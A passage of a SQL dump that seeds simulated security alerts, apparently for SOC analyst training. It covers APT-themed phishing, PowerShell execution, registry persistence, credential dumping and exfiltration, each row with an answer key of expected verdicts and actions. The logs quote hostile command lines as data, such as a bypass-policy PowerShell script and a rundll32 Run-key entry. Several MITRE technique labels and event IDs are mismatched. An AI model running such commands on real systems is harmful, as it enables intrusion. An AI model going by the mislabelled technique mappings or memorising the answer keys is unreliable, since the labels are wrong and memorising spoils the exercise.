incident.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (377, 'Forensic Artifact Recovery Initiated', 'high', 'Incident Response Tools', 'The incident response team has initiated recovery of forensic artifacts to preserve crucial evidence. The operation is aimed at understanding the attack vectors and preventing future occurrences. Advanced techniques were used to collect and analyze data from compromised systems.', 'Containment', 'T1113 - Screen Capture', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"IR-20231015-0023\",\"source_ip\":\"192.168.1.15\",\"detected_malware\":{\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"malicious_tool.exe\"},\"attacker_ip\":\"203.0.113.45\",\"user\":\"compromised_user\",\"forensic_artifacts\":[{\"type\":\"memory_dump\",\"filename\":\"memdump_20231015.raw\"},{\"type\":\"disk_image\",\"filename\":\"disk_image_20231015.img\"}],\"action\":\"artifact_recovery_initiated\",\"status\":\"success\"}', '2026-01-03 23:52:02', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address assigned to compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Known malicious hash associated with advanced persistent threat.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known threat actor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_scan\",\"verdict\":\"malicious\",\"details\":\"Detected as part of the ongoing investigation into the breach.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"suspicious\",\"details\":\"User account exhibiting unusual activity patterns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (378, 'Mitigation and Remediation Measures Implemented', 'medium', 'System Recovery Logs', 'The recovery team has successfully deployed remediation measures to neutralize the threat and restore affected systems. Mitigation strategies included blocking identified malicious IP addresses and resetting credentials for compromised user accounts.', 'Recovery', 'T1556 - Credentials from Password Stores', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T09:23:45Z\",\"event_id\":\"RECOVERY-20231015-0001\",\"source\":\"system_recovery\",\"action\":\"remediation_implemented\",\"affected_systems\":[{\"hostname\":\"server1.internal.network\",\"internal_ip\":\"192.168.1.10\",\"external_ip\":\"203.0.113.15\",\"malicious_ip\":\"198.51.100.34\",\"compromised_user\":\"j.doe\",\"affected_files\":[{\"filename\":\"malicious_payload.exe\",\"file_hash\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\"}],\"remediation_actions\":[\"blocked_ip\",\"reset_credentials\",\"removed_malicious_files\"]}]}', '2026-01-03 23:52:02', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelFeed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in multiple malware campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAudit\",\"verdict\":\"internal\",\"details\":\"User account had unauthorized access attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (379, 'Phishing Email Detected', 'medium', 'Email Gateway Logs', 'APT1 has initiated the attack by sending a spear-phishing email containing a malicious attachment to gain initial access.', 'Initial Access', 'T1566.001 - Spearphishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"email_id\":\"c2b2d5f8-8f5a-4e6b-bef8-7b2d1e2e9f30\",\"from\":\"attacker@maliciousdomain.com\",\"to\":\"victim@targetdomain.com\",\"subject\":\"Urgent: Update Your Account Information\",\"attachment\":\"Invoice_2023.pdf.exe\",\"attachment_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\"}', '2026-01-04 00:59:40', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Domain associated with known phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a trojan used by APT1.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP Abuse DB\",\"verdict\":\"malicious\",\"details\":\"IP used in previous phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_2023.pdf.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File name mimics legitimate invoice documents.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (380, 'Malicious Payload Execution', 'high', 'Endpoint Detection and Response (EDR) logs', 'The malicious attachment was opened, leading to the execution of a payload that attempts to establish a foothold within the network.', 'Execution', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"203.0.113.45\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -EncodedCommand aW1wb3J0LXNlc3Npb24=\",\"file_hash\":\"b19d2f1e3c8b4f1b8f2e8a5c6d3a2b7c\",\"filename\":\"malicious_attachment.docx\",\"threat_level\":\"high\",\"description\":\"Suspicious PowerShell command execution detected.\"}', '2026-01-04 00:59:40', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP used by user jdoe.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"reputation_database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b19d2f1e3c8b4f1b8f2e8a5c6d3a2b7c\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_attachment.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"suspicious\",\"details\":\"File used to deliver malicious payload.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"active_directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (381, 'Persistence Mechanism Installed', 'medium', 'Registry and Scheduled Task Logs', 'APT1 establishes persistence by creating scheduled tasks and modifying registry keys to maintain access even after reboots.', 'Persistence', 'T1053.005', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:52:35Z\",\"event_id\":7045,\"source\":\"Service Control Manager\",\"description\":\"A service was installed in the system.\",\"service_name\":\"UpdateService\",\"service_file\":\"C:\\\\Windows\\\\System32\\\\svchost.exe -k netsvcs\",\"registry_modification\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\UpdateService\",\"scheduled_task_creation\":{\"task_name\":\"UpdateTask\",\"task_file\":\"C:\\\\Windows\\\\System32\\\\updatetask.exe\",\"task_user\":\"SYSTEM\"},\"internal_ip\":\"10.0.0.15\",\"external_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"admin\"}', '2026-01-04 00:59:40', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT1 activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known malware used by APT1.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"suspicious\",\"details\":\"Username used in suspicious activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (382, 'Credential Dumping Detected', 'high', 'Security Information and Event Management (SIEM) alerts', 'APT1 is attempting lateral movement by utilizing harvested credentials to access critical systems within the network. Anomalous login attempts detected from an unauthorized source IP address.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:17Z\",\"event_id\":\"4625\",\"log_source\":\"Windows Security Log\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"admin_user\",\"logon_type\":\"3\",\"failure_reason\":\"Unknown user name or bad password\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_message\":\"An account failed to log on. Subject: Security ID: NULL SID, Account Name: -, Logon Process: NtLmSsp, Authentication Package: NTLM, Workstation Name: -\"}', '2026-01-04 00:59:40', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a critical system.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Username of a privileged account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NULL', 1, 0, NULL), (383, 'Data Exfiltration Attempt', 'high', 'Network Traffic Analysis', 'In the final phase, APT1 attempts to exfiltrate sensitive data to an external server, marking the culmination of the attack.', 'Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T14:22:35Z\",\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"method\":\"POST\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"bytes_sent\":10485760,\"uri\":\"/api/upload\",\"filename\":\"confidential_data.zip\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"john.doe\",\"status_code\":200}', '2026-01-04 00:59:40', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint_database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known APT1 command and control servers.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious data exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_analysis\",\"verdict\":\"malicious\",\"details\":\"File contains sensitive data intended for exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_hr\",\"verdict\":\"internal\",\"details\":\"Legitimate user credentials possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (384, 'Spear Phishing Email Detected', 'medium', 'Email Gateway Logs', 'APT3 initiates their attack with a well-crafted spear phishing email, targeting key employees to gain a foothold into the network. The email contains a malicious attachment designed to exploit the recipient\'s system.', 'Initial Access', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.25\",\"email_subject\":\"Urgent: Action Required for Your Account\",\"email_sender\":\"john.doe@fakecompany.com\",\"email_recipient\":\"jane.smith@targetcompany.com\",\"attachment\":{\"filename\":\"Invoice_2023.docx\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\"}', '2026-01-04 02:06:57', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with APT3 command and control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of targeted employee within the network.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"john.doe@fakecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"Email address used in a known spear phishing campaign by APT3.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with a malicious document used in phishing attacks.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (385, 'Malicious PowerShell Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'APT3 executed a PowerShell script on a compromised system to deploy additional payloads, aiming to maintain a stealthy presence and further infiltrate the network.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"event_id\":\"4624\",\"computer_name\":\"compromised-host-01\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.24\",\"internal_ip\":\"10.0.1.15\",\"script_name\":\"Invoke-MaliciousScript.ps1\",\"script_hash\":\"3e2f5d9b7a6f4c5e8a8e7b2f6d1a9c3e\",\"process_id\":\"4567\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\Invoke-MaliciousScript.ps1\",\"parent_process\":\"explorer.exe\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\Invoke-MaliciousScript.ps1\"}', '2026-01-04 02:06:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT3\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Invoke-MaliciousScript.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"EDR\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used by APT3\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3e2f5d9b7a6f4c5e8a8e7b2f6d1a9c3e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT3 payload\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (386, 'Establishing Persistence via Registry Modification', 'high', 'Windows Registry Logs', 'To ensure continued access to the infected system, APT3 modifies registry settings. This registry modification allows their malware to persist even after system reboots.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:24:17Z\",\"event_id\":4657,\"event_type\":\"Registry Modification\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.102\",\"user\":\"SYSTEM\",\"registry_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"modified_value_name\":\"APT3PersistentService\",\"modified_value_data\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Temp\\\\malicious.dll,EntryPoint\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious.dll\"}', '2026-01-04 02:06:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT3 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT3 malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Vendor\",\"verdict\":\"malicious\",\"details\":\"DLL identified as APT3 persistence mechanism.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (387, 'Lateral Movement through Credential Dumping', 'high', 'Network Traffic Analysis', 'APT3 has initiated lateral movement within the network by utilizing credential dumping techniques. The attacker has successfully accessed additional systems using stolen credentials, aiming to expand their reach within the network.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:32Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.45\",\"event_type\":\"credential_dumping\",\"username\":\"jdoe\",\"dumped_file\":\"NTDS.dit\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"action\":\"lateral_movement_attempt\",\"protocol\":\"SMB\",\"network_segment\":\"internal\",\"alert_id\":\"alert_10234\"}', '2026-01-04 02:06:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalAssetDB\",\"verdict\":\"internal\",\"details\":\"Internal network address.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"UserBehaviorAnalytics\",\"verdict\":\"suspicious\",\"details\":\"User credentials potentially compromised.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (388, 'Data Exfiltration via Encrypted Channels', 'high', 'Data Loss Prevention (DLP) Systems', 'In the final stage, APT3 attempts to exfiltrate sensitive data using encrypted channels, aiming to evade detection mechanisms. The operation was detected when unusual encrypted traffic was observed between internal host 192.168.1.45 and an external IP address 203.0.113.5. The malicious file \'encrypted_payload.zip\' with hash \'d41d8cd98f00b204e9800998ecf8427e\' was involved in the exfiltration attempt.', 'Exfiltration', 'T1048.003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:00Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"HTTPS\",\"file_name\":\"encrypted_payload.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"exfiltration_attempt\",\"status\":\"blocked\"}', '2026-01-04 02:06:57', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host participating in exfiltration attempt.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"encrypted_payload.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"DLP Database\",\"verdict\":\"suspicious\",\"details\":\"File involved in suspected data exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used by APT3.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (389, 'Initial Access via Compromised MSP Credentials', 'high', 'Authentication Logs', 'APT10 exploits stolen credentials from a managed service provider to infiltrate the aerospace company\'s network, setting the stage for a prolonged espionage campaign. Anomalous login detected from an external IP address using compromised MSP credentials.', 'Credential Theft', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:00Z\",\"event_type\":\"authentication_attempt\",\"username\":\"msp_admin@aerospacecompany.com\",\"auth_status\":\"success\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"method\":\"password\",\"event_id\":\"auth-789654\",\"mfa_status\":\"not_required\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"msp_admin@aerospacecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised managed service provider credentials.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known threat actor activities.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal aerospace company network IP.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (390, 'Execution Using DLL Side-Loading', 'high', 'Application Logs', 'The threat actors employ DLL side-loading to execute their malicious code under the guise of trusted applications, evading traditional detection mechanisms.', 'Execution', 'T1073.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"4624\",\"application\":\"legitapp.exe\",\"loaded_dll\":\"msvcr110.dll\",\"original_dll_path\":\"C:\\\\Program 